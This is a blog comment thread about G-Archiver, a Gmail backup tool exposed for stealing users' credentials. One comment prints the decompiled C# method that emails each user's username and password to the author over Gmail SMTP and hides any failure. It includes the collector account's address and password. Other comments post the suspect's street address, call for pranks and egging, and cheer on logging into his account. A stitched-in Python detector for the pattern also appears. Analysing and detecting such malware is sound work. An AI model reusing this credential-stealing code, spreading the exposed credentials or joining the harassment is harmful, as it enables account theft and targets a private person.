Not to be an ass or something, congratulations and thanks for your research.... it's just curiosity.

Wot on March 10, 2008 4:47 AM

Actually John Terry is a quite famous guy.
http://www.chelseafc.com/page/ThePlayers/0,,10268~5593,00.html

Name is most probably just bogus - especially if this was intent.

Petter Jensen on March 10, 2008 4:59 AM

I never found a decent email archive program so I wrote one in Python about a year ago, it downloads your emails to text files (saves the extensions too). I figure there might be some people looking for a decent, simple email archiver so I threw it online. You can find it here...

http://lab.noopsi.com/popbak/

Jeff, I hope it is okay to post a link like this. I polished the script over the weekend because after reading this post on Friday I figured there might be some people looking for a new email backup utility. Also, since it is written in Python there aren't any secret surprises since you can see everything Popbak does.

Jaymon on March 10, 2008 5:04 AM

Now someone has posted the guy's address, suggesting people send pizza and plumbers.
This has gone a little too far methinks.

Paul Duggan on March 10, 2008 5:32 AM

I'm guessing that Mate/MateMedia is just the proxy used for domain registration with GoDaddy rather than Douchebagus Maximus himself. I have a domain registered through GoDaddy and I use one called DomainsByProxy to keep my personal contact info out of DNS. You'd probably just be sending a pizza to the guy who started the proxy organization. Not to imply that he mightn't appreciate some za...

Brian on March 10, 2008 6:12 AM

It looks like from his password "bilal482" which is an asian name, his name might not be John Terry at all.

Amit on March 10, 2008 6:16 AM

Umm...let me get this straight -

You want to back up your email, which contains a bunch of sensitive data. Rather than back it up securely on your own machine or device (which can be done in, probably, thousands of different ways), you decide to download some random application that was written by someone you don't know, and then blissfully punch your username and password into it.

Can we please stop talking about heroes and villains and start talking about stupidity?

Terry on March 10, 2008 6:23 AM

@David W: The garchiver site is still "up", but the "Free Download" and "Buy now" links have been removed. I guess that's better than nothing, under the circumstances.

- Roddy

Roddy on March 10, 2008 6:26 AM

There is a difference between "ethics" and "acting in defense of another."

Sometimes, one has to betray the first in order to do the second. Regardless of all the arguments to the contrary, something WAS seriously wrong with that code. Even someone with only basic HTML programming can see that.

Dustin may not have taken an "ethical" path, but he did act in the defense of both himself and the other people who were at risk. There are too many arguments going back and forth about who was right and who was wrong... several of them not even applying to this entry.

"War" ethics are a hotly debated topic and have no place here. As my mother would ask: "What has that got to do with the price of tea in China?" Reply: About the same as it has to do with this post.

Point Simple: Dustin acted to protect himself and other users. That is not a vigilante act. He performed the internet version of tripping up a purse snatcher or pickpocket.

He is, in essence, a witness to wrong-doing. He is the one who halted it and contacted GMail about it. The fact that he has not been further contacted by GMail or law-enforcement authorities shows that they're really making an effort and busting their backsides to bring this guy to justice, doesn't it? /sarcasm

Cranky Goldfish on March 10, 2008 6:38 AM

I don't know about in the USA but in the UK this would actually be illegal as it would fall under our data protection act. Basically no one can store your information without letting you know first then they must remove it after it has become unreasonable to keep (likely out of date, not needed etc..). It is also their responsibility to hold it securely.

pete on March 10, 2008 6:41 AM

// Decompiled with Reflector from the SM.dll shipped with G-Archiver.
// Despite its name, CheckConnection tests nothing: it mails the user's Gmail
// username (a) and password (b) to the author's own mailbox, then discards
// any error so the user never sees a failure.
using System;
using System.Net;
using System.Net.Mail;
using System.Text;

public class Mail
{
    public static void CheckConnection(string a, string b)
    {
        try
        {
            MailMessage message = new MailMessage();
            message.To.Add("JTerry79@gmail.com");
            message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
            message.Subject = "Account";
            message.SubjectEncoding = Encoding.UTF8;
            message.Body = "Username: " + a;
            message.Body = message.Body + "\r\nPassword: " + b;
            message.BodyEncoding = Encoding.UTF8;
            message.IsBodyHtml = false;
            message.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
            client.Port = 0x24b; // 587, Gmail's STARTTLS submission port
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            client.Send(message);
        }
        catch (Exception)
        {
            // Every exception is swallowed, so a failed send is invisible to the user.
        }
    }
}

Brian on March 10, 2008 7:07 AM
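As an added example (not code from the post or from G-Archiver), here is a small Python heuristic that flags the shape of the method Brian posted: parameters copied into a mail body, a hard-coded NetworkCredential, an SMTP host, and a catch block that swallows everything. The two C# samples are constructed, with the collector address and password replaced by placeholders, and the rule weights and threshold are my own assumptions.

```python
"""Heuristic scan of decompiled .NET (C#) source for credential exfiltration.

Added example, not code from the post or from G-Archiver. Rule weights and the
threshold are assumptions; tune them against a corpus of known-good code.
"""
import re

# (rule name, pattern, points). A rule scores once per file however often it
# matches; every matching line is still reported in the findings.
RULES = [
    ("credential_string_in_body",
     re.compile(r'"[^"]*(?:Username|Password)\s*:\s*"', re.IGNORECASE), 3),
    ("hardcoded_network_credential",
     re.compile(r'new\s+NetworkCredential\s*\(\s*"[^"]+"\s*,\s*"[^"]+"\s*\)'), 3),
    ("hardcoded_smtp_host", re.compile(r'\.Host\s*=\s*"smtp\.[^"]+"'), 1),
    ("smtp_send", re.compile(r'\bSmtpClient\b|\.Send\s*\('), 1),
    ("empty_catch", re.compile(r'catch\s*(?:\([^)]*\))?\s*\{\s*\}'), 2),
]
METHOD = re.compile(r'(?:public|private|internal|protected)\s+(?:static\s+)?'
                    r'[\w<>\[\]]+\s+(\w+)\s*\(([^)]*)\)')
BODY_ASSIGN = re.compile(r'\.Body\s*=\s*([^;]+);')
SUSPICIOUS_THRESHOLD = 5  # assumption


def _line_of(src, pos):
    return src.count("\n", 0, pos) + 1


def scan(source):
    """Return {'findings': [(rule, line), ...], 'score': int, 'suspicious': bool}."""
    # Strip // comments so a catch block holding only a comment still counts as
    # empty (naive: this also clips "http://..." inside string literals).
    src = re.sub(r'//[^\n]*', '', source)
    findings, score = [], 0
    for name, rx, points in RULES:
        hits = [_line_of(src, m.start()) for m in rx.finditer(src)]
        findings.extend((name, line) for line in hits)
        if hits:
            score += points
    # Data-flow check: does a method parameter end up in an outgoing mail body?
    methods = list(METHOD.finditer(src))
    for i, m in enumerate(methods):
        end = methods[i + 1].start() if i + 1 < len(methods) else len(src)
        body_rhs = BODY_ASSIGN.findall(src[m.end():end])
        params = [p.split()[-1] for p in m.group(2).split(",") if p.strip()]
        for param in params:
            if any(re.search(r'\b%s\b' % re.escape(param), rhs) for rhs in body_rhs):
                findings.append(("parameter_in_mail_body:" + param, _line_of(src, m.start())))
                score += 2
    return {"findings": findings, "score": score,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


# Constructed sample: the shape of the posted G-Archiver method, with the
# collector address and password replaced by placeholders.
SUSPECT_SOURCE = r'''
public static void CheckConnection(string a, string b)
{
    try {
        MailMessage message = new MailMessage();
        message.To.Add("collector@example.com");
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("collector@example.com", "PLACEHOLDER");
        client.Host = "smtp.gmail.com";
        client.Send(message);
    } catch (Exception) { }  // swallowed
}
'''

# Constructed sample: what an honest connection test looks like.
BENIGN_SOURCE = r'''
public static bool TestConnection(string host, int port)
{
    try {
        SmtpClient client = new SmtpClient(host, port);
        client.Send(new MailMessage());
        return true;
    } catch (SmtpException ex) {
        Log.Warn(ex.Message);
        return false;
    }
}
'''
```

Running `scan(SUSPECT_SOURCE)` scores 14 and flags both parameters as flowing into the mail body, while the honest test scores 1 for merely using SmtpClient.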

Only 1 word ...... incredible !

Bye, Cristian.

Manualinux, the Linux Manual http://www.manualinux.com

Cristian on March 10, 2008 7:17 AM

Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for google checkout.
I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well.
The only emails in this account were usernames/passwords. This wasn't a personal account used for other things.
The only thing I worry about now is his account getting restored from Gmail. Does anyone have a good way to contact them? I sent something through their "suggestions form," because it was the only one I could find.

Dustin on March 10, 2008 7:21 AM

I don't think you were too quick or too harsh Dustin. I think you did exactly the right thing and as others have said I would have contacted GMail and the FBI (since it's interstate fraud).

I don't think a wholesale abandoning of shareware is the answer. Nor is open source. While this may seem like a smoking gun for the case of open source let's not be so reactionary. There are many, many honest software developers that release their software as shareware to get their product on people's desktops.

You wouldn't say, "I stubbed my toe on the kitchen table so we must outlaw all tables... and toes."

Kaitain on March 10, 2008 7:47 AM

I haven't read all the posts, but I'll try to answer a few more questions.
Yes, I did kind of screw up by downloading some random software and I'll take the idiot card for that. I was essentially looking for something that would backup the gmail emails in their entirety. I use the labels almost religiously on everything in my box and wanted a way to keep those intact (which by the way Thunderbird will kind of do using IMAP, so yay).
Since this program wasn't going to cut it, I wanted to see how much code went into getting it this far in case I was going to be forced to try and write something myself. I've used Reflector on a lot of things, that doesn't mean I've stolen other people's code, claimed it as my own, sold it on the black market and killed puppies as some people seem to think.
Oh, and a lot of the emails had been opened. And there is absolutely no reason to have a debug function to email the username and password of a gmail account, to another gmail account.
And to email all the affected accounts would mean getting each name individually off the body of the message. They were sent from jterry to jterry, so they weren't added to his contacts.

Dustin on March 10, 2008 7:56 AM

I used to live literally down the street from where this guy apparently lives. I might pay him a visit next time I go back home - me and a dozen eggs.

PaoloB on March 10, 2008 7:57 AM

The difference between a black-hat hacker and a hero is how they use their abilities and in this case IMHO our friend Dustin Brooks did do us a favor. The fact that he reverse-compiled the code is a white-hat technique in the hacking world. (Modifying it and then turning into a worm, etc would be a black-hat/script kiddie thing). Frankly it's the curious sorts who have discovered things like the Sony Rootkit fiasco, etc. Don't blame DB because he DIDN'T think to lock out the account and then call google, he mitigated the threat and then called google. In security, mitigation comes first THEN investigation. Sometimes this means you lose your attacker/offender but it's better to be safe first. WE SHOULD Blame the bloody b@st@rd who wrote this crapola code and then posted it for public use! Frankly, I suspect it was a sub-contracted job and the person who did it decided to take a few, er, liberties with his/her code.
Our personal information is everywhere and is easily accessible so DB's quick move was in our favor... Do yourselves a favour and do a zabasearch on your name. You might be shocked at what you find.
-S
PS This is not a plug for zabasearch, I just find the site fascinating.
PPS If I discover that someone has my personal information unencrypted in a spreadsheet, or a word doc, or a text file, or a hash file or in HTML or a file with a well known format, first I politely ask them to remove the information and then if I can go over their head if they do not comply. It's happened where I work (names and socials out in the open!) and I've seen it on websites (myspace, etc). We must be vigilant to protect our identities!
PPPS rotate your passwords everywhere, every 60 days.


STB on March 10, 2008 8:06 AM

You should submit that to thedailywtf.com

David on March 10, 2008 8:51 AM

You know, skimming the comments after getting here from Daring Fireball, I'm surprised nobody brought up this classic...

http://cm.bell-labs.com/who/ken/trust.html

Des Courtney on March 10, 2008 9:09 AM

Hey, how about blurring/mosaicing out the 10 or so gmail names that are in that screenshot?

Too late. They'll now get even more spam.

Man chowda on March 10, 2008 9:09 AM

@Dustin:

In case you decide to delete John Terry's google account,
http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32046

Anonymous on March 10, 2008 9:19 AM

Ryan,

Well, the jury's still out on whether you're an idiot, so no worries. :-D

Eric on March 10, 2008 9:47 AM

Technically, there should be no need for JTerry to have included his own login credentials in his code. I absolutely guarantee that GMail does not require any authentication for inbound emails. It is completely trivial to send a message via SMTP (the protocol is completely text based and can be used via a telnet program). MIME headers and formatting are not required.

smbarbour on March 10, 2008 10:23 AM

Excellent work man, its good to have people like you around.

kefka on March 10, 2008 10:51 AM

erm... are you familiar with the concept of "POP mail". when you can pop your gmail down for free.. why were you looking for an alternative to backup your emails???

mansoor on March 10, 2008 10:58 AM

Oh, very unpleasant.

GUmy on March 10, 2008 11:00 AM

It looks like G-archiver has been taken down from all of the shareware download sites, as well as the G-archiver website itself. Does anyone still have a link to the original executable? I would love to peruse the decompiled source code for myself.

DBrant on March 10, 2008 11:13 AM

I find it odd that no one referenced this yet (though, admittedly I had to stop reading comments to this one eventually... great participation though). You can setup a trap in your gmail/yahoo/webmail accounts to make sure no one else is reading them. I can't take credit for this idea, but... I hope it helps.

http://www.makeuseof.com/tag/are-you-sure-your-email-isnt-being-hacked/

Basically, you create an irresistible named subject for an email, and send it to yourself like "Password list" and in it have either a link or html to load a hitcounter. Just keep the email in your box. Anyone trolling it will undoubtedly read it, and your hitcounter account registers a hit.

BTW- anyone using gmail chat or yahoo messenger, keep aware that your chat logs are also available, archived, on their servers. Apparently you can turn them off, but.. personally, after finding several passwords I sent to users in my own chatlogs, it's made me think twice about sending anything at all over the big provider networks, period.

Whitewlf on March 10, 2008 11:15 AM

I agree with Domenic. DPAPI does not solve all problems. Is there a way the writer of this program could have used DPAPI? Wouldn't the installer at least need the password in plain text so that DPAPI could encrypt it specifically for the machine the software was installed on?

Marc on March 10, 2008 11:21 AM

Open source ftw?

Petras on March 10, 2008 11:50 AM

This is kind of a catch-22, why would Dustin log into John's account without breaking some sort of ethics? If I was Dustin I would have done the same thing. But imagine if he logged into his email account and there was nothing?

Jesus DeLaTorre on March 10, 2008 11:59 AM

-- We use Lutz as a verb. "Let's lutz it and find out"

I'm having that one David. Duly adopted.


I'm very skeptical of any third-party site or application that asks for username and password. These days access to your e-mail account gives a person access to your entire life.

Moral of the story: Trust No One.

Derek on March 10, 2008 12:14 PM

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

I think that at some point it has to come down to your own moral compass. I've worked in and around the defense industry my whole career. The thing is, the industry is about a whole lot more than just killing. For instance, I've done projects for NASA, which is about the most noble work I think a software engineer can be involved in. I've worked on flight simulators which keep pilots from *dying* from their mistakes while they are learning to fly. I've worked on shipboard engine controllers, which are what helps keep our sailors alive when the chips are down.

On the other hand, I have had two situations where I had to put my foot down. The first was a tank simulator for the Chinese army about 5 years after Tiananmen. (Two ways I'm doing that: no way, and no f'n way!)

The second was a job offer I got for building smartbombs.

Not that I'm being judgemental here. I'm sure there are some people who could sit in a chair at the retirement home at the end of their career and be proud of a life spent building bombs. After all, a properly coded one probably causes less collateral damage and deaths than conventional bombs to produce the same effect. However, I am not one of those people.

T.E.D. on March 10, 2008 12:16 PM

Here is where this douce bag lives:

10431 SW 88TH STREET SUITE D309, MIAMI FL 33176

Everyone send pizza and plumbers there.

TED on March 10, 2008 12:27 PM

I think people are confusing that this is all work of Jeff because of few reasons:

1. The way Jeff puts light-colored block and alignment in paraphrased is sometimes hard to notice. It is done nicely, but too nicely to differentiate.

2. Language Jeff used is buried between two paraphrases.

Personally I have found such entries quite confusing but appreciate that since I don't read all feeds, Jeff's is kind of digg to me, which helps me get such interesting content.

Ketan

Ketan on March 10, 2008 12:41 PM

I blogged about this kind of behavior once before, but the *message* got lost. This is *exactly* the sort of thing I was talking about:

http://eddiesguy.blogspot.com/2007/08/heroes-villains-and-software.html

Mike Hofer on March 10, 2008 1:04 PM

I tend to agree with what Dave said, was Jeff's action not taking the law into his own hands?

However on the other hand, Well done Jeff on writing this post. This type of programmer behaviour is criminal and leads to a total invasion of one's privacy.

As much as there are ethics and hopefully the majority of professionals follow them, there is always the criminal mind. I am of the opinion that the industry should be more regulated and programmers held accountable for malicious code. I know this is an impossible ask, but would it not be nice?

Brett on March 10, 2008 1:49 PM

Just for kicks I wanted to see if the PW was changed back or not, and noticed the password hint (as updated by Dustin)

"Why shouldn't I hard code my username and password into my software that sends me everyones personal information??"

LOL

Elijah on March 11, 2008 2:15 AM
